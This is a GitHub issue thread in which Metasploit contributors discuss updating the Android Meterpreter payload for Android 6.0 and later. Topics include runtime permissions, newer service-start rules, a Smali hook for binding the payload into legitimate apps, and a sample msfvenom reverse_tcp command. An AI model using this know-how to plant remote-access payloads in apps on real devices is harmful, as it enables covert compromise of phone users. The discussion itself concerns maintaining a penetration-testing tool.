### ISSUE TITLE
[Enhancement Request] - Modern Android Meterpreter Payload for SDK 23 and Above

### ISSUE THREAD

**Issue by Morsmalleo** [rapid7/metasploit-payloads#695]
Hi guys, sorry if this sounds like a dumb idea, I don't mean to waste anyones time, but I'm dropping a few ideas for updates or variations (whatever you want to call it lol) of the Android Meterpreter Payload, considering that the current version of the Android Meterpreter Payload is only configured to run against SDK 10 through 19, which are quite old, which ends up presenting problems for the payload when it's ran against SDK 23 an Above.

A few problems I noticed because of this are documented below.

1. When you bind an Android Meterpreter Payload to an original application that was compiled against any SDK 23 (Android 6.0 Marshmallow) and above, they will find that none of the Android Meterpreter Payload Permissions are granted, nor will they receive a prompt to grant them either, this is because Install-Permissions present in Android 5.1 (Lollipop) and below were replaced with Runtime Permissions in Android 6.0 and above and granting these permissions manually isn't ideal.

2. The current Java configuration for the external Smali hook `invoke-static {}, com/Metasploit/stage/MainService;->start()V` in the `MainService.java` and `Payload.java` files Android Meterpreter files don't seem to won't to work in terms of starting the payloads MainService externally via the external Smali hook to establish a connection back to the listening `msfconsole`.

    - I'm not sure why this is but this could either be due to changes made to the way *Reflection* is used to access Internal API's in Java, or it could be because the Smali hook was injected into an external *Main Activity Class* rather than an external *Main Application Class*, and I only think that because that the payload utilises Reflection in Java to access Internal API's in order to get the context of the current running application class, which of course would contain the Smali hook for externally starting the payloads MainService (CORRECT ME IF I AM WRONG THERE), either that or it could be changed to how services are handled in the background after SDK 22, correct me if I am wrong 😊😊

Could a backwards compatible version of the Android Meterpreter that would work for both older and newer Android SDK's be ideal? or maybe keep the current meterpreter version as a legacy for older SDK's, and have a seperate one for new SDK's.

This is revised edit of my original Enhancement Request for this one. 😊

**Comment by bcoles** [comment]
Ideally Android payloads should work on all versions of Android, but supporting all versions becomes increasingly difficult with time and will likely become impossible eventually.

In instances where we can't maintain backward compatibility, perhaps the payload generation code should require the user to specify a minimum and/or maximum Android SDK version as a payload option.

These existing issues are also related to newer Android versions and backwards compatibility:

* https://github.com/rapid7/metasploit-framework/issues/17694
* https://github.com/rapid7/metasploit-framework/issues/17620

Unfortunately there is very little development activity for the Android payloads - you're likely on your own with implementing these changes.

**Comment by Morsmalleo** [comment]
> Ideally Android payloads should work on all versions of Android, but supporting all versions becomes increasingly difficult with time and will likely become impossible eventually.
> 
> In instances where we can't maintain backward compatibility, perhaps the payload generation code should require the user to specify a minimum and/or maximum Android SDK version as a payload option.
> 
> These existing issues are also related to newer Android versions and backwards compatibility:
> 
> * [apktool will drop suport for aapt1 metasploit-framework#17694](https://github.com/rapid7/metasploit-framework/issues/17694)
> * [Android 14 to block old API versions metasploit-framework#17620](https://github.com/rapid7/metasploit-framework/issues/17620)
> 
> Unfortunately there is very little development activity for the Android payloads - you're likely on your own with implementing these changes.

Well unfortunately @bcoles that's not the case because the Android Payload is configured to work in devices devices running Android 2.3.3 (SDK 10) upto Android 5.1 Lollipop (SDK 22), yes that's my bad by the way I said SDK 16 upto SDK 22 in my initial post, that was a typo, I've since fixed it.

the below configuration from the Android Payloads `MainActivity` will only handle Install-time permissions and older methods of starting the payloads service in the background

<details>
    <summary>Code</summary>

```java
public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        MainService.startService(this);
        finish();
    }
}
```
</details>


As I explained in my initial post, the way permissions are requested and granted or denied changed after Android 5.1 when Android 6.0 (SDK 23) was released because 6.0 introduced Runtime Permissions which deprecated Install-Time Permissions.

Then the when Android 8.0 Oreo (SDK 26) released, that introduced changes to how Services are started and handled, which deprecated the old methods of starting the Android Payloads Service in the background on older devices.

There are plenty of libraries for backwards compatibility with older android devices with new android code, the AndroidX's `AppCompat` library does this, however if BC isn't the way to go, that's why I suggested seperate payloads, one for older devices and one for newer devices, maintaining the Android Payload is not impossible, it just requires a bit of work put into it 😊

Also thank for taking the time to reply as well 😁

**Comment by bcoles** [comment]
>> Ideally Android payloads should work on all versions of Android, but supporting all versions becomes increasingly difficult with time and will likely become impossible eventually.

> Well unfortunately @bcoles that's not the case

Ideally Android payloads should work on all versions of Android.

Currently Android payloads do not work on all versions of Android.

Supporting all versions became increasingly difficult.


> that's why I suggested seperate payloads, one for older devices and one for newer devices

This does not fit with Metasploit design. Typically payload generation produces a single file.

In instances where we can't maintain backward compatibility, perhaps the payload generation code should require the user to specify a minimum and/or maximum Android SDK version (or specific version) as a payload option. This way the user can generate multiple payloads to support multiple versions of Android.

**Comment by Morsmalleo** [comment]
> > > Ideally Android payloads should work on all versions of Android, but supporting all versions becomes increasingly difficult with time and will likely become impossible eventually.
> 
> > Well unfortunately @bcoles that's not the case
> 
> Ideally Android payloads should work on all versions of Android.
> 
> Currently Android payloads do not work on all versions of Android.
> 
> Supporting all versions became increasingly difficult.
> 
> > that's why I suggested seperate payloads, one for older devices and one for newer devices
> 
> This does not fit with Metasploit design. Typically payload generation produces a single file.
Yeah that's what I mean, with the `AppCompat` in the java android library in AndroidX, a payload coded for modern android devices would work on older devices as well as newer devices allowing only a single file to be generated (at least that's what I've got from documentation anyway)
> In instances where we can't maintain backward compatibility, perhaps the payload generation code should require the user to specify a minimum and/or maximum Android SDK version (or specific version) as a payload option. This way the user can generate multiple payloads to support multiple versions of Android.
> THIS, is actually a really good idea, so basically something like `msfvenom -x android/meterpreter/reverse_tcp minSdk=16 maxSdk=22 LHOST=<IP Address> LPORT=<Port Number> > R payload-api16-22.apk`
> **Edit:** In retrospect, you're talking about two separate payloads within framework, not generating two separate payloads. That approach may work.
My original idea was this yes, but the above suggestion you gave me seems better 😊

**Comment by Morsmalleo** [comment]
> Supporting all versions became increasingly difficult.

Yeah that's fair enough, I can certainly understand that 😁

**Comment by Morsmalleo** [comment]
> Yeah that's what I mean, with the `AppCompat` in the java android library in AndroidX, a payload coded for modern android devices would work on older devices as well as newer devices allowing only a single file to be generated (at least that's what I've got from documentation anyway)

Sorry I meant `ActivityCompat` not `AppCompat| I mixed up the two.

**Comment by h00die** [comment]
https://github.com/rapid7/metasploit-framework/issues/19154
